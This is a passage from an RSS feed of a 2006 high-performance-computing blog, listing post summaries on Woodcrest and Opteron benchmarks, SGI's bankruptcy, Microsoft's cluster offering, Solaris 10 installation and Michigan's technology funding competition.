It is a reflection of each person, how they view the world, and how they think, and their approach to life that filters into this stuff. Elements of personality are in there.</description>
    </item>
    
    <item>
      <title>Accelerator Processor Units (APUs) for non-scientific applications</title>
      <link>https://blog.scalability.org/2006/08/accelerator-processor-units-apus-for-non-scientific-applications/</link>
      <pubDate>Thu, 03 Aug 2006 16:15:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/accelerator-processor-units-apus-for-non-scientific-applications/</guid>
      <description>I have been talking recently with a person about using FPGAs to accelerate non-scientific applications, specifically business applications.
The idea is fundamentally interesting. HPC is not the only thing that needs acceleration. My question is this: Where are the critical pain points, what processing takes a great deal of time that people would be willing to spend, I dunno, $10,000 US to make go faster? I am using $10,000 US as a rough guess.</description>
    </item>
    
    <item>
      <title>SGI updates</title>
      <link>https://blog.scalability.org/2006/08/sgi-updates/</link>
      <pubDate>Thu, 03 Aug 2006 16:01:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/sgi-updates/</guid>
      <description>I haven&amp;rsquo;t said anything about SGI recently, been too busy with other things. This is good, but much has been happening in SGI land.
First, I had wondered whether or not SGI stake holders would get anything out of the company &amp;hellip; that is, whether or not it would survive the bankruptcy proceedings. It does appear to be navigating those waters well, but it is worth noting a few things in case you haven&amp;rsquo;t followed the story.</description>
    </item>
    
    <item>
      <title>When I calls them, I really calls them ...</title>
      <link>https://blog.scalability.org/2006/08/when-i-calls-them-i-really-calls-them/</link>
      <pubDate>Wed, 02 Aug 2006 18:08:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/when-i-calls-them-i-really-calls-them/</guid>
      <description>See this bit of propaganda and the money quotes on Linux within
Let me get this straight &amp;hellip; I want to make sure I understand this &amp;hellip; You really want your expensive HPC computing resource/platform set up by someone who doesn&amp;rsquo;t know HPC? Sort of like wanting that expensive database server set up by a Windows technician with no knowledge of databases? Or that nice web server set up by someone with no knowledge of web servers?</description>
    </item>
    
    <item>
      <title>Woodcrest part 3</title>
      <link>https://blog.scalability.org/2006/08/woodcrest-part-3/</link>
      <pubDate>Wed, 02 Aug 2006 03:27:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/woodcrest-part-3/</guid>
      <description>Just when I thought I understood things &amp;hellip; Ran the original test case that we ran previously, but with the rebuilt GAMESS with a modern compiler.
Ran one on the 2.66 GHz Woodcrest, one on the 2.2 GHz Opteron. Both are dual core, I don&amp;rsquo;t have a 2.4 or 2.6 GHz dual core set of Opterons to put into a machine. Used 4 way parallel on shared memory machine. Woodcrest has a 2x cache size advantage, has a 30% faster memory system, and about a 20% clock speed advantage.</description>
    </item>
    
    <item>
      <title>Woodcrest part 2</title>
      <link>https://blog.scalability.org/2006/08/woodcrest-part-2/</link>
      <pubDate>Tue, 01 Aug 2006 20:57:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/08/woodcrest-part-2/</guid>
      <description>So by now you know I ran an old binary and an old test on the Woodcrest and Opteron. I wasn&amp;rsquo;t impressed with the results; the hype was out of proportion with the reality. Let&amp;rsquo;s assume that Intel suggests we recompile our code. I pulled down a new GAMESS (the 2-2006 variant), built it with the PGI compiler (though I had to do some option tweaking, it was otherwise OK), and ran it.</description>
    </item>
    
    <item>
      <title>We&#39;ve got a Woodcrest ...</title>
      <link>https://blog.scalability.org/2006/07/weve-got-a-woodcrest/</link>
      <pubDate>Mon, 31 Jul 2006 20:09:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/07/weve-got-a-woodcrest/</guid>
      <description>for testing/development and other purposes. Config is reasonable, with an upgrade later today. 2 x 2.66 GHz (5130) processors, 4 GB RAM, nice video card (Quadro FX/4500).
Installed SuSE 10.1 with updates/patches. My expectations were that this machine would positively blow the doors off of a similarly clocked Opteron (252). Given the massive hype around Woodcrest, this is what one might expect. If you are going to hype like mad, you need to be able to deliver on the hype.</description>
    </item>
    
    <item>
      <title>How to lose a market without really trying</title>
      <link>https://blog.scalability.org/2006/07/how-to-lose-a-market-without-really-trying/</link>
      <pubDate>Thu, 27 Jul 2006 15:49:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/07/how-to-lose-a-market-without-really-trying/</guid>
      <description>We are working on some benchmarks for a customer. This is a commercial code, closed source, MPI based.
Cluster in question is an Infinipath based system. I cannot say enough good things about the HTX based Infinipath systems, they are very fast, very low latency. And they come with an MPI stack. Ok, let me give you a hint where this is going. The benchmark could not run, as the code could not run on the nice super fancy Infinipath system.</description>
    </item>
    
    <item>
      <title>21st Century postmortem</title>
      <link>https://blog.scalability.org/2006/07/21st-century-postmortem/</link>
      <pubDate>Thu, 20 Jul 2006 15:12:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/07/21st-century-postmortem/</guid>
      <description>About a week has passed, and a friend said something quite interesting about this. Michigan has decided not to invest in Michigan&amp;rsquo;s future. Amusing.
The commercialization areas that we submitted for were to be scored on Scientific and Technical basis, Personnel, Commercialization Merit, and fund leverage. The first sentence of the review sets the tone. &amp;ldquo;The technical merit of this proposal could be phenomenal, but there is a lack of explanation of the important underlying science.</description>
    </item>
    
    <item>
      <title>21st Century update</title>
      <link>https://blog.scalability.org/2006/07/21st-century-update/</link>
      <pubDate>Thu, 13 Jul 2006 19:14:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/07/21st-century-update/</guid>
      <description>Results are in and we did not advance. Good luck to the advancers. Update: Looking over the results, not a single advanced computing project was advanced. HPC was completely ignored which runs counter to what they said they would do. Lots of automotive bits were advanced. The message for a small HPC company located in Michigan is sadly getting clearer.</description>
    </item>
    
    <item>
      <title>21st Century (non)update</title>
      <link>https://blog.scalability.org/2006/07/21st-century-nonupdate/</link>
      <pubDate>Thu, 13 Jul 2006 16:57:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/07/21st-century-nonupdate/</guid>
      <description>We have been patiently waiting to hear whether or not we advanced to the next round. We already know the fate of one proposal which we helped on, but was not one of our own submissions. That was discarded on a technicality: according to the report back from the compliance tester, an index entry reporting on confidential material and color pages was not pointing to the right pages. It was not screened for content, as it did not pass screening for format.</description>
    </item>
    
    <item>
      <title>Thoughts on Solaris 10</title>
      <link>https://blog.scalability.org/2006/07/thoughts-on-solaris-10/</link>
      <pubDate>Tue, 11 Jul 2006 23:04:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/07/thoughts-on-solaris-10/</guid>
      <description>I have opined here that I do not believe that Solaris will overtake Linux&amp;rsquo;s lead in HPC clusters. This does not mean that I don&amp;rsquo;t think it can have a role.
Basically, imagine you have to deliver a service. Something like Google. The end user of Google doesn&amp;rsquo;t care what OS the underlying software runs on. They care about their usage. Same with the end user of Yahoo, Slashdot, Digg, &amp;hellip; .</description>
    </item>
    
    <item>
      <title>Apologies</title>
      <link>https://blog.scalability.org/2006/07/apologies/</link>
      <pubDate>Tue, 11 Jul 2006 22:35:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/07/apologies/</guid>
      <description>Folks, we are getting spammed. If something gets through, please note that I want to apologise in advance and I will handle it as soon as possible. If I miss something, fire me a note.</description>
    </item>
    
    <item>
      <title>Test drive of the 6/06 Solaris 10 part 2, usage</title>
      <link>https://blog.scalability.org/2006/07/test-drive-of-the-606-solaris-10-part-2-usage/</link>
      <pubDate>Sat, 08 Jul 2006 23:02:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/07/test-drive-of-the-606-solaris-10-part-2-usage/</guid>
      <description>The machine is up. If you don&amp;rsquo;t know about Blastwave, it is a helpful resource. Once you set up your machine, mosey over there, and get all the tools you would otherwise be missing.
nVidia graphics, pulled down the Solaris nVidia binary, installed it, rebooted and up it came. nVidia makes great chips and great drivers. We are lucky they are still supporting Solaris. We have an Itanium2 linux box here where the nVidia drivers are built for the old XFree86 versus xorg used in Centos 4.</description>
    </item>
    
    <item>
      <title>Test drive of the 6/06 Solaris 10 part 1, installation</title>
      <link>https://blog.scalability.org/2006/07/test-drive-of-the-606-solaris-10-part-1-installation/</link>
      <pubDate>Fri, 07 Jul 2006 21:13:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/07/test-drive-of-the-606-solaris-10-part-1-installation/</guid>
      <description>My experience with the 1/06 Solaris 10 was, well, less than good. I came away with the impression of a system that is very hard to install, one might say extraordinarily hard to install, with few supported systems. Video didn&amp;rsquo;t work, networking required going to an unsupported freeware site, pulling down a binary driver, and doing something akin to insmod in linux.
I was simply not impressed with the installation. It was horrible.</description>
    </item>
    
    <item>
      <title>followup to another conversation</title>
      <link>https://blog.scalability.org/2006/07/followup-to-another-conversation/</link>
      <pubDate>Fri, 07 Jul 2006 19:51:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/07/followup-to-another-conversation/</guid>
      <description>For reasons I don&amp;rsquo;t quite understand WP seems to have eaten Dan&amp;rsquo;s post. Here it is, re-replicated: Looks like we both have trouble being succinct! Thanks for the Linux lessons. I&amp;rsquo;ve worked in both Windows and UNIX environments professionally, but I&amp;rsquo;ve never done any real work with Linux. I appreciate learning more, and your information is helpful. There&amp;rsquo;s no doubt that you are 100% correct about one thing: the market will decide.</description>
    </item>
    
    <item>
      <title>And now for something completely different ...</title>
      <link>https://blog.scalability.org/2006/06/and-now-for-something-completely-different/</link>
      <pubDate>Fri, 23 Jun 2006 20:56:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/06/and-now-for-something-completely-different/</guid>
      <description>Well, I wanted to get back to our core for a bit.
The Michigan Growth Capital Symposium has been done for a month. My great fear in presenting there was that I wouldn&amp;rsquo;t be speaking to money people, but would in fact be speaking to business consultants, advisors, CEO/CFO/etc for hire. Sadly, most of my audience appeared to be that. Some were PR folks, some were nice to speak with, some were, well &amp;hellip; A few VCs and fewer money people.</description>
    </item>
    
    <item>
      <title>More about the tactics: commoditized HPC coming from an MCSE/Best Buy near you</title>
      <link>https://blog.scalability.org/2006/06/more-about-the-tactics-commoditized-hpc-coming-from-an-mcsebest-buy-near-you/</link>
      <pubDate>Fri, 23 Jun 2006 19:55:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/06/more-about-the-tactics-commoditized-hpc-coming-from-an-mcsebest-buy-near-you/</guid>
      <description>Microsoft is pushing its resellers to enter this market.
From here
Uh huh. Remember those paper MCSEs? Clusters are far more complex to get right than a basic PC network. Diagnosing and solving performance problems on tightly coupled machines is non-trivial. This is going to be &amp;hellip; interesting.</description>
    </item>
    
    <item>
      <title>Tactics versus strategy for the HPC market</title>
      <link>https://blog.scalability.org/2006/06/tactics-versus-strategy-for-the-hpc-market/</link>
      <pubDate>Fri, 23 Jun 2006 02:47:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/06/tactics-versus-strategy-for-the-hpc-market/</guid>
      <description>I have given the Microsoft entry into cluster computing a great deal of thought. I want to see if this is a force to be reckoned with, or something else. Will they matter in the long term?
A tactic is something you execute to further a long term goal. You may change tactics to achieve your goals. You may alter your tactical foci to adjust to market conditions. Individual tactics are not the important element; what matters is how they advance you toward your goals.</description>
    </item>
    
    <item>
      <title>How the Microsoft WCC could be good or bad</title>
      <link>https://blog.scalability.org/2006/06/how-the-microsoft-wcc-could-be-good-or-bad/</link>
      <pubDate>Mon, 12 Jun 2006 04:21:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/06/how-the-microsoft-wcc-could-be-good-or-bad/</guid>
      <description>While thinking this through, there are a number of serious issues with WCC I can spot. I won&amp;rsquo;t go through them here, I want to mull over them for a while.
MPI. Supporting a new interconnect is hard. You have to relink your application. This is true on all platforms. Some such as the Scali system attempt to make this easy by separating layers, and allowing you to compile your app and select the fabric at runtime.</description>
    </item>
    
    <item>
      <title>One of those --YARGH!!!-- moments ...</title>
      <link>https://blog.scalability.org/2006/06/one-of-those-yargh-moments/</link>
      <pubDate>Fri, 09 Jun 2006 17:01:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/06/one-of-those-yargh-moments/</guid>
      <description>Imagine you have a great idea. You think about it, design it, test it, try it. You approach customers with it and they are very interested. You do the market research, find that the market is growing like banshees, build a business plan, do all the footwork. Then you go look for capital to make it happen.
So here you are with your great idea, and you see lots of other people starting to have similar inklings.</description>
    </item>
    
    <item>
      <title>A cluster system from Microsoft</title>
      <link>https://blog.scalability.org/2006/06/a-cluster-system-from-microsoft/</link>
      <pubDate>Fri, 09 Jun 2006 16:08:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/06/a-cluster-system-from-microsoft/</guid>
      <description>I had a conversation recently with two nice people from Microsoft about their (now released) WCC product. One of the people, Patrick, wrote a comment (for some reason WordPress is editing it, so go to this URL: http://scalability.org/?p=59#comment-40 ) here that is worth looking at.
I have been skeptical of the WCC product in that I didn&amp;rsquo;t understand what Microsoft&amp;rsquo;s vision was for this (no guffaws here), and thought that I might be misinterpreting what I didn&amp;rsquo;t hear.</description>
    </item>
    
    <item>
      <title>An interesting view SGI with some misconceptions</title>
      <link>https://blog.scalability.org/2006/05/an-interesting-view-sgi-with-some-misconceptions/</link>
      <pubDate>Mon, 29 May 2006 16:43:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/05/an-interesting-view-sgi-with-some-misconceptions/</guid>
      <description>In this post, the author indicates that SGI committed suicide, or at least attempted it twice. Their rationale was that the NT porting bit was the first phase, and that the Itanium choice was the second. Further they posit that there is no value left in the company. I disagree with the first and third points. SGI acquired Cray during the time when we were busy taking away their business. This was IMO, one of the first fatal mistakes.</description>
    </item>
    
    <item>
      <title>The art of benchmarketing (or how to not represent reality in the most positive manner)</title>
      <link>https://blog.scalability.org/2006/05/the-art-of-benchmarketing-or-how-to-not-represent-reality-in-the-most-positive-manner/</link>
      <pubDate>Sun, 28 May 2006 01:54:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/05/the-art-of-benchmarketing-or-how-to-not-represent-reality-in-the-most-positive-manner/</guid>
      <description>All of us are guilty at some point in time or the other, of embellishing some attribute about something we talk about. We like our choice to be the &amp;ldquo;winner&amp;rdquo;, whatever that means. This &amp;ldquo;crime&amp;rdquo; takes many forms.
What we see quite often is omission, either purposeful or inadvertent, which paints a different picture than &amp;ldquo;reality&amp;rdquo; would indicate. We also see specious comparisons, and poor analytics to back up the conclusions.</description>
    </item>
    
    <item>
      <title>A need for (SSE) speed</title>
      <link>https://blog.scalability.org/2006/05/a-need-for-sse-speed/</link>
      <pubDate>Sun, 21 May 2006 06:39:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/05/a-need-for-sse-speed/</guid>
      <description>Simple problem. You have two &amp;ldquo;vectors&amp;rdquo; of 32 bit signed integers, and you want to do the vector equivalent of vector_a = max_element_by_element(vector_a, vector_b); Can you do this with SSE2?
We need this. Badly. You can always argue that you can use code like this for MAX (or MIN): MAX(a,b) = (a+b + abs(b-a)) &amp;gt;&amp;gt; 1; MIN(a,b) = (a+b - abs(b-a)) &amp;gt;&amp;gt; 1; Of course this is correct; it can be done.</description>
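The MAX/MIN identity quoted above is easy to sanity-check. A minimal sketch in Python (the vec_max/vec_min names are mine, not from the post; note that Python integers never overflow, whereas in 32-bit SSE lanes the intermediate a+b sum can wrap, so the identity needs headroom or saturating arithmetic there):

```python
def vec_max(a, b):
    # Element-wise max via the identity MAX(a,b) = (a + b + abs(b - a)) >> 1
    return [(x + y + abs(y - x)) >> 1 for x, y in zip(a, b)]

def vec_min(a, b):
    # Element-wise min via the identity MIN(a,b) = (a + b - abs(b - a)) >> 1
    return [(x + y - abs(y - x)) >> 1 for x, y in zip(a, b)]

print(vec_max([1, 5, -3], [4, 2, -3]))  # [4, 5, -3]
print(vec_min([1, 5, -3], [4, 2, -3]))  # [1, 2, -3]
```

The trick works because a+b plus or minus the absolute difference doubles the larger or smaller operand, and the shift halves it back.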
    </item>
    
    <item>
      <title>Update on blog changes</title>
      <link>https://blog.scalability.org/2006/05/update-on-blog-changes/</link>
      <pubDate>Sat, 20 May 2006 19:32:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/05/update-on-blog-changes/</guid>
      <description>First we have updated WordPress. Took a while but it was worth it. Second, we are getting far more spam than usual, so I have disabled pingback/trackback. I am sorry about this; please email me if this causes you problems. Update: We re-enabled pingback/trackback and implemented some anti-spam technology. Let&amp;rsquo;s see if it works.</description>
    </item>
    
    <item>
      <title>Our Scalable HMMer paper</title>
      <link>https://blog.scalability.org/2006/05/our-scalable-hmmer-paper/</link>
      <pubDate>Fri, 19 May 2006 19:51:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/05/our-scalable-hmmer-paper/</guid>
      <description>Is available if you would like some good reading from IEEE. For those who don&amp;rsquo;t know, we reworked the p7Viterbi function in the HMMer code, and created a faster version of HMMer in the process. Our measurements put it anywhere from 1.6-2.5x faster than the downloadable binaries from Professor Eddy&amp;rsquo;s site. Since HMMer is GPLed, our patch and binaries are available under that license from our download site. If you wish to distribute binaries that are not covered by GPL or are unwilling to use the GPL for your product and want to distribute this code, please contact us.</description>
    </item>
    
    <item>
      <title>looks out the window checking for porcine shapes aloft ...</title>
      <link>https://blog.scalability.org/2006/05/looks-out-the-window-checking-for-porcine-shapes-aloft/</link>
      <pubDate>Thu, 18 May 2006 23:22:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/05/looks-out-the-window-checking-for-porcine-shapes-aloft/</guid>
      <description>Dell it seems is about to enter the market with some Opteron units. I don&amp;rsquo;t see any high-flying porcines, and while it is cold today in Michigan, some town here has not frozen over. So what&amp;rsquo;s going on? Seems like the simple economics of the market are testing the loyalty principle of manufacturers. You stick with your suppliers as long as possible, as good relationships can often help smooth over rough patches.</description>
    </item>
    
    <item>
      <title>Whither SGI</title>
      <link>https://blog.scalability.org/2006/05/whither-sgi/</link>
      <pubDate>Sat, 13 May 2006 14:02:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/05/whither-sgi/</guid>
      <description>Obviously SGI has existential challenges ahead. This means something quite simple. No cow is sacred. No egos can get in the way of doing the right thing by the shareholders. I will be frank. This is about 9 years too late. First, will SGI recover? Possibly, though I am not going to bet on it. The challenges are not just internal; their competitors have wasted no time in making use of their situation.</description>
    </item>
    
    <item>
      <title>Something cluster-like this way comes</title>
      <link>https://blog.scalability.org/2006/05/something-cluster-like-this-way-comes/</link>
      <pubDate>Thu, 11 May 2006 05:04:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/05/something-cluster-like-this-way-comes/</guid>
      <description>It appears that Microsoft is about ready to release CCS. This might be interesting, depending upon what was done, and how it all works. Some things to note. It includes a job scheduler. Built into the OS. This is either a really good thing, or a really bad thing. I can see arguments both ways. It includes bits that Linux has had for a while. Remotable/scriptable installation. Multiple security models. Some thoughts.</description>
    </item>
    
    <item>
      <title>... signifying nothing ...</title>
      <link>https://blog.scalability.org/2006/05/signifying-nothing/</link>
      <pubDate>Mon, 08 May 2006 20:25:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/05/signifying-nothing/</guid>
      <description>I note today that SGI has filed for Chapter 11 protection from its creditors. Whether or not they emerge from bankruptcy is an open question, and one we will surely learn over the next several months. One could talk about everything that led them to where they are now, and no doubt you will see such analyses in the press. Without reading them, I can&amp;rsquo;t tell you how close to the mark they are.</description>
    </item>
    
    <item>
      <title>Interesting NUMA issues in current SuSE kernel</title>
      <link>https://blog.scalability.org/2006/05/interesting-numa-issues-in-current-suse-kernel/</link>
      <pubDate>Mon, 08 May 2006 02:54:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/05/interesting-numa-issues-in-current-suse-kernel/</guid>
      <description>One of our development systems is a dual socket system with 2 dual core Opteron 275 chips. 4 GB RAM, nice disk config, and a Quadro FX/1400. This is a good machine to work on. I had set it up with SuSE 9.x, and had left it at 9.3 for quite a while. Recently we upgraded it to SuSE 10.0 Pro. More modern kernel, somewhat updated apps. I thought it would be nice to stay somewhat current.</description>
    </item>
    
    <item>
      <title>Positives and negatives</title>
      <link>https://blog.scalability.org/2006/04/positives-and-negatives/</link>
      <pubDate>Thu, 27 Apr 2006 13:32:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/04/positives-and-negatives/</guid>
      <description>Positive news: My company has been selected to present at the Michigan GCS. This is in line with what we submitted to the 21st century fund a few months ago. Also, we received notes that 2 of our applications had passed compliance screening for this. The end game of this is to ramp up an idea/project/product we have been thinking of and working on for the past several years. The market looks ready for it.</description>
    </item>
    
    <item>
      <title>SCSI vs FC vs SATA</title>
      <link>https://blog.scalability.org/2006/04/scsi-vs-fc-vs-sata/</link>
      <pubDate>Wed, 26 Apr 2006 12:34:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/04/scsi-vs-fc-vs-sata/</guid>
      <description>I have heard this argument come up again several times recently. Lots of folks out there from the enterprise storage realm still love their FC drives. The SCSI crowd like their units. Both handily disparage SATA as being inferior, poorly performing, or with higher failure rates. This is an interesting point. As far as I am aware, all the drives come physically off the same manufacturing production line. The only significant difference between the units that I am aware of (modulo newer motors on newer units) are the electronics that connect to the bus.</description>
    </item>
    
    <item>
      <title>In the limit, as N(cores) -&gt; infinity ...</title>
      <link>https://blog.scalability.org/2006/04/in-the-limit-as-ncores-infinity/</link>
      <pubDate>Fri, 14 Apr 2006 04:28:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/04/in-the-limit-as-ncores-infinity/</guid>
      <description>So way back in the good old days, programming a single core CPU in a high performance manner was a challenge. Compilers promised much and delivered small fractions of maximum theoretical performance. To get nearly optimal performance, you had to hand code assembly language routines. You would never be able to achieve 100% utilization of the processor capabilities, but you might be able to sufficiently balance memory operations with floating point and integer operations so that you were utilizing a sizeable fraction of the chip&amp;rsquo;s subsystem capabilities.</description>
    </item>
    
    <item>
      <title>MEDC update</title>
      <link>https://blog.scalability.org/2006/04/medc-update/</link>
      <pubDate>Thu, 13 Apr 2006 22:20:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/04/medc-update/</guid>
      <description>According to the MEDC site, 505 applications were turned in for mostly commercial efforts. 505&amp;hellip; The mind boggles. Of those 505, 139 are commercialization. Another smattering are also commercial, though hidden. Call that 150 commercial ones. In all the previous competitions; the MLSC (Michigan Life Science Corridor), the MTTC (Michigan Tri Technology Corridor), the commercial side was given less than a serious consideration. A token gesture might be a better way to describe it.</description>
    </item>
    
    <item>
      <title>To (open)solaris or not to (open)solaris, that is the question</title>
      <link>https://blog.scalability.org/2006/04/to-opensolaris-or-not-to-opensolaris-that-is-the-question/</link>
      <pubDate>Mon, 10 Apr 2006 16:26:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/04/to-opensolaris-or-not-to-opensolaris-that-is-the-question/</guid>
      <description>Platform consolidation is in full swing in HPC, and has been for a while. This is an economic reality. The platforms that ISVs tell us will be supported into the future are Windows and Linux. We don&amp;rsquo;t see much new AIX support. It is simply not a volume platform. Nor do we see much new HP/UX support. It is also not a volume platform. Similarly, we don&amp;rsquo;t see much new Solaris 10 support.</description>
    </item>
    
    <item>
      <title>What OSes will run on the supercomputers of the future?</title>
      <link>https://blog.scalability.org/2006/03/what-oses-will-run-on-the-supercomputers-of-the-future/</link>
      <pubDate>Wed, 29 Mar 2006 03:31:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/03/what-oses-will-run-on-the-supercomputers-of-the-future/</guid>
      <description>This is not a simple question to answer. It likely will change a few times over the course of time. But we can be reasonably sure that there won&amp;rsquo;t be widespread installations of Irix, AIX, HP/UX and others of their ilk. There are many reasons for this: technological, legal, business, marketing, and so forth. Looking at the top 500 list, it isn&amp;rsquo;t a high risk bet that Linux will remain in some form or other.</description>
    </item>
    
    <item>
      <title>HPC in the critical path</title>
      <link>https://blog.scalability.org/2006/03/hpc-in-the-critical-path/</link>
      <pubDate>Tue, 28 Mar 2006 04:07:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/03/hpc-in-the-critical-path/</guid>
      <description>Is high performance computing a critical path technology? Is it a technology that you cannot do without? This is a question some potential partners were discussing this evening. Very interesting question. If HPC is not critical, then demand for it should be quite moderate. If it is not critical, then the market would have basically replacement level growth rates. If end users did not see a value in HPC, they wouldn&amp;rsquo;t use it, as their time would be spent elsewhere.</description>
    </item>
    
    <item>
      <title>The coming of the &#34;grid&#34; (the hopefully hype-free or hype-reduced model that is)</title>
      <link>https://blog.scalability.org/2006/03/the-coming-of-the-grid-the-hopefully-hype-free-or-hype-reduced-model-that-is/</link>
      <pubDate>Tue, 21 Mar 2006 21:42:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/03/the-coming-of-the-grid-the-hopefully-hype-free-or-hype-reduced-model-that-is/</guid>
      <description>Someone gets it. I can&amp;rsquo;t say much more now, or even point to who gets it. Then again, with all companies and decisions comes baggage. While they get the idea, there is this little matter of the baggage they attached to their grid to fix another problem. Customers bringing application code over to their grid are going to be in for a surprise. Sometimes your baggage has been creatively destroyed by other newer baggage, and you have to live with that.</description>
    </item>
    
    <item>
      <title>Are we back to bubble-nomics again?</title>
      <link>https://blog.scalability.org/2006/03/are-we-back-to-bubble-nomics-again/</link>
      <pubDate>Mon, 20 Mar 2006 13:42:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/03/are-we-back-to-bubble-nomics-again/</guid>
      <description>I know, it&amp;rsquo;s dangerous to Post Before Coffee (PBC) in the morning. It increases the possibility of missing critical features of an argument, and there tends to be more bloviation, stream of approximate consciousness, and so forth. I read an article this morning from the Wall Street Journal&amp;rsquo;s WSJ.com site that evoked many emotions and thoughts. This article was entitled &amp;ldquo;Silicon Valley Start-Ups See Cash Everywhere&amp;rdquo; with several basic points being made:</description>
    </item>
    
    <item>
      <title>Michigan&#39;s 21st Century Jobs Fund</title>
      <link>https://blog.scalability.org/2006/03/michigans-21st-century-jobs-fund/</link>
      <pubDate>Thu, 16 Mar 2006 14:46:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/03/michigans-21st-century-jobs-fund/</guid>
      <description>Competition is in full swing. This is the first year it is (mostly) well designed to make a difference to Michigan. Kudos to the folks who resisted the pressure to make this identical to the MTTC/MLSC of prior years. You can still see echoes of that pressure, but I expect this to be a very exciting year with interesting proposals that will have a net positive benefit for Michigan if some are funded.</description>
    </item>
    
    <item>
      <title>It is a tale Told by an idiot, full of sound and fury, Signifying nothing.</title>
      <link>https://blog.scalability.org/2006/03/it-is-a-tale-told-by-an-idiot-full-of-sound-and-fury-signifying-nothing/</link>
      <pubDate>Wed, 08 Mar 2006 06:13:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/03/it-is-a-tale-told-by-an-idiot-full-of-sound-and-fury-signifying-nothing/</guid>
      <description>SGI announced another RIF. That&amp;rsquo;s more good people tossed onto the street. That&amp;rsquo;s good technology about to be, or already, dumped. SGI and I go way back, to 1993 when I started running molecular dynamics simulations on SGI machines. These machines were fast (those R3000&amp;rsquo;s were like butta &amp;hellip;). I liked them so much, and liked playing with them so much, that I joined the company straight out of graduate school.</description>
    </item>
    
    <item>
      <title>significant growth in HPC markets</title>
      <link>https://blog.scalability.org/2006/03/significant-growth-in-hpc-markets/</link>
      <pubDate>Tue, 07 Mar 2006 14:26:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/03/significant-growth-in-hpc-markets/</guid>
      <description>IDC is out with its estimated numbers, based upon 3 quarters of data, and one quarter of estimated data. The summary is amazing. 20+% CAGR for this market. It is about 9B$ (yes, that is a B meaning billion or 10^9, which is 10**9 for old timers). It is growing about 1.8B$/year at the present. Clusters are growing 60-90% per year. And so on. This is tremendously exciting. HPC demand is huge and getting larger.</description>
    </item>
    
    <item>
      <title>Amusing</title>
      <link>https://blog.scalability.org/2006/02/amusing/</link>
      <pubDate>Tue, 28 Feb 2006 14:02:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/02/amusing/</guid>
      <description>The IBM folks have turned the Blue Gene into what they claim is the world&amp;rsquo;s fastest BLAST engine. Interesting read. They use our A. thaliana data in the Bioinformatics Benchmark System v3 (BBS) to perform their measurement, as well as data from Aaron Darling for mpiBLAST. Our data had been in a mislabeled file for years, and I never took the time to rename the S. lycopersicum for the original Arabidopsis.</description>
    </item>
    
    <item>
      <title>Thoughts on Microsoft cluster offerings</title>
      <link>https://blog.scalability.org/2006/02/thoughts-on-microsoft-cluster-offerings/</link>
      <pubDate>Thu, 23 Feb 2006 15:08:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/02/thoughts-on-microsoft-cluster-offerings/</guid>
      <description>I haven&amp;rsquo;t seen it yet. Eventually, when I get more time, I want to play with it, but from what I have heard it is not ready for prime time yet. That said, I would like to note that the Cygwin tools are really good. I just built LAM-7.1.1 using them. Tried it out and it works quite nicely (at least on this box). A major coup for Microsoft would be if they tossed their existing SFU bits and used Cygwin.</description>
    </item>
    
    <item>
      <title>The difference between an architecture and a product [part 2]</title>
      <link>https://blog.scalability.org/2006/02/the-difference-between-an-architecture-and-a-product-part-2/</link>
      <pubDate>Sun, 19 Feb 2006 04:43:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/02/the-difference-between-an-architecture-and-a-product-part-2/</guid>
      <description>More reflections on the differences between architectures and products. Beowulf and most cluster systems are architectures to be built. Many vendors attempt to freeze the architecture, or restrict variations of it in order to build a polished product. Polished products are finished. They have a finished feel to them. Someone went through and actually made stuff work, identified broken stuff, and had someone fix them. Well, not all clusters are like this, some feel like stacked boxes that the cluster vendor could get at a low price, as the cluster vendor knows how to spell HPC, but not do it.</description>
    </item>
    
    <item>
      <title>Of business models, and business reality</title>
      <link>https://blog.scalability.org/2006/02/of-business-models-and-business-reality/</link>
